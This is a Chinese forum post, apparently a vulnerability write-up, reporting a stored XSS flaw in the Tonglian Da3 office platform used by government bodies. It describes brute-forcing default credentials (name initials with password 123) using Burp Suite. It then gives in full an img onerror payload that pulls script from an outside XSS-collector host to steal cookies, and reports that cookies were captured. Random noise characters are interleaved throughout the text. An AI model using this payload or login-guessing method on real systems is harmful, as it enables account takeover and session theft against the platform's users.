! m2 [) Q) l5 |2 Y j, e5 t: ^
. K: v/ R$ |/ ] I
同联Da3协同办公平台后台通用储存型xss漏洞
6 @) u x i3 ~# P9 g7 A
: R* Q5 Q7 x4 R/ r
4 c6 O6 O( B9 K" n) u 平台简介:
2 {/ h3 @$ K; |9 g% X
7 v" b* k t$ \
/ g8 \: S; K& d, Y / n' Y7 u& c4 U: ^9 Z
( _' `! E, ^0 s5 }
7 f, ?! a. _) U( ~ 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
2 ^. e" \/ L$ j0 O- H) Z5 V+ J
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
7 n6 I5 A) i7 I, V. v同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
) d& d5 @2 S. I m& Z2 d+ C
$ ^6 a# O, W1 Q% F. ~4 q% E
! z; b l: S& E( |9 G6 ^; y8 q# J
# f6 E$ }2 t) G' t7 ?
9 a. K" L$ B: q% E 7 K( i8 N# W$ x5 \2 Z- q" ~" T. x
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
: y; F- I1 K; y6 W
5 U) ^; h; W# |7 u+ s' v+ Q
* `7 P1 v7 F/ T' ^9 M ! n7 x, C% D) J5 ]/ P z4 D# L
( d4 ?9 Y2 W3 o% ]+ z& ]" S7 L9 v0 j
7 w& n8 Y! m5 l; T+ W
http://1.1.1.1:7197/cap-aco/#(案例2-)% o2 k7 I' i- W0 m
1 G' U$ ~+ H7 s% L. ?
7 }1 W4 H! q l4 U& h* H5 W6 X0 ~1 l http://www.XXOO.com (案例1-官网网站): N0 |+ B; }6 a( N8 c
& |- p. @) T1 M j8 y
/ F* W' Q1 x N0 A1 f$ U2 W8 F 漏洞详情:+ z0 [1 R6 @) Y
/ C1 t( m2 ]+ Y$ Q* j
* t* x/ R! X- O. N2 e1 ? 案例一、
4 ^$ Y \3 L# G0 ~9 g/ W
4 L4 N# C8 |2 g5 i ; g9 ^. v2 i. l
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
* E0 I. a7 D! V1 W- z
" Z1 D2 G3 ~2 w$ G
6 m# N: B! J$ E. o& Z4 j
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
( E/ I$ m2 Z# x2 v5 C, P8 A0 o
- Z, v! V8 b1 O" f% j ; t9 j" l. y l l$ q+ [& k. s
3 S# b! t- u( \1 K4 a+ J; k# s. X
: b: m7 A' x4 R) M: [+ i% S
* G7 u8 e, m$ E+ \5 \6 ?! f7 _ 
( T1 E' \5 V' g4 x, t- E
# J' J" t) S7 |7 b8 @, z' u
3 \- I3 ~5 P2 `8 I2 G2 ?6 \ status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
& d; @( c+ Z* w0 L9 ]: b2 x# I
* J/ v. @; B% [7 @
5 f( I5 E# O- w2 x
4 c3 p! @9 O6 V a
& N) ^1 }# u9 L. |$ k4 ]: u
6 A/ q5 Z1 K, k f 
6 {8 E' z3 X, d3 |9 Z3 {
. O$ {6 B; D# j1 z8 H
1 n- N. _: {( X 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
# r. k2 p% r) N! [
1 T3 m- K; ~9 l4 a9 y z( ^2 H
9 {4 v$ ?+ R- v6 }
; s) ~' w1 Q- M. @% L0 Q/ \ s
l$ r. ^# S: X* l8 b
8 a1 K- ]$ v3 z3 o <img src=x
7 u- M" y+ d' W1 c% Z( p# \ G; Ronerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: 0 _$ D- s6 M# P% J# _
, n! Q! D1 L' H9 j7 }2 R9 ^
. }+ A c: P( f1 O9 t3 c
7 G- w: Q/ q7 n
: S, M7 ]# A# Q; U/ u " \, a; {6 w7 l/ F0 G. R
然后发送,接收cookie如图:
& w4 N# M9 u" R. S }2 y: S; F( t9 ^- {
2 k, G. h t; S1 b! V
, |5 ^ \6 o7 }9 M$ R ' s1 m; t. w% U
% Z: [' i' O$ C
- Z& C# j. B( u6 t. Q1 \
( N9 U7 c# N! y+ k& H3 T8 z7 l
- k! I/ Z/ W9 Z) z0 T1 K% Z
5 d' [& N/ ?# B& ^' e2 y
2 K+ l. G) a4 X! X! @9 a3 M
+ y8 j) O( R5 X, ~. p6 [* s 2 Z* u1 S) T4 z8 p, B" u
4 S% _; R9 H$ P4 K
% b7 Q& L+ J% V% n* O; ~; E6 a
0 ~, d G. t9 d4 d
' |" }& y/ [! s7 O3 U6 f% f
( p( U* V7 Q. } U5 r: d: |* [ - ]1 m1 y0 i: v% n
# b# B3 D4 A- w) m$ c
) R& `5 m1 Y0 c9 K, D, z
c8 M1 L5 i$ `1 X7 Q7 H- ^ ?0 X1 J1 b. A& k6 H0 D1 I
! R9 a: c4 M, y; _, O" Z/ |
( X. u( R, g3 a4 F 案例2、 8 P1 S' ?5 B M/ R4 q
2 C: h8 Z4 W Q6 ^* e0 z
( E1 v& A1 X. U5 X' i% u+ q( E6 \ 前面步骤都一样,下面看效果图:
g6 V2 ]9 {, L" S
& ]# Y( ?+ v# J [
; n# o" L- C- }# W4 A# U; O3 D8 K+ ?
3 G6 N+ }" m; }1 T/ H
Z( m4 ]1 A1 `6 s* ^! Q
+ K3 o* ?* j# J& H, v
1 u6 B. s+ ^$ q0 y: B
5 v$ t' \9 w- `* r( x9 t
) A2 n7 l- N8 |2 L$ I4 p " r ]: Q* [7 U" \8 v* w) z( s4 U
# o# _2 k3 a X
4 F: w/ G N' R, C
6 |+ r7 A$ F( S% b' {3 @& N! t
+ P, [+ s! P" O4 n / R, n- G7 d1 @9 S. q
2 \7 @) ^! G/ l5 [9 Y
) G0 h, \% L; E6 C0 G. u, O( h9 x! t 3 w6 K( j$ j- i& v x" w7 y# i5 ?' U
3 Q1 Z3 [( u6 h' x: i
3 u0 g8 Q, n# B! \
: ?" S9 B& e8 q \* E7 ?
" o/ ?7 o: M4 Y: @; J2 H
% A0 n/ S/ k# ? + Y# ^( u& `# v5 L
. F1 k! X [/ l8 q
) d) [3 I1 E$ c+ }4 u' c, Z) J, X
, B2 H3 `" b, `0 n8 a
. M9 W# ^; O, e' i, T( h$ k
{4 p/ V) z. m& `% s 
发表于 2018-10-20 20:14:15
收藏
支持
反对